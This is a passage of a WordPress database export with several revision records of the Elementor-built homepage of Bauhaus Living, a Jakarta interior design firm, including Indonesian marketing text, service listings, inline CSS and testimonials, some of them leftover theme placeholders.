<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:08:59','2023-09-22 10:08:59','',22,'https://bauhaus.futuremediatrix.com/?p=4930',0,'revision','',0),(4931,3,'2023-09-22 10:08:59','2023-09-22 10:08:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:08:59','2023-09-22 10:08:59','',22,'https://bauhaus.futuremediatrix.com/?p=4931',0,'revision','',0),(4932,3,'2023-09-22 10:08:59','2023-09-22 10:08:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			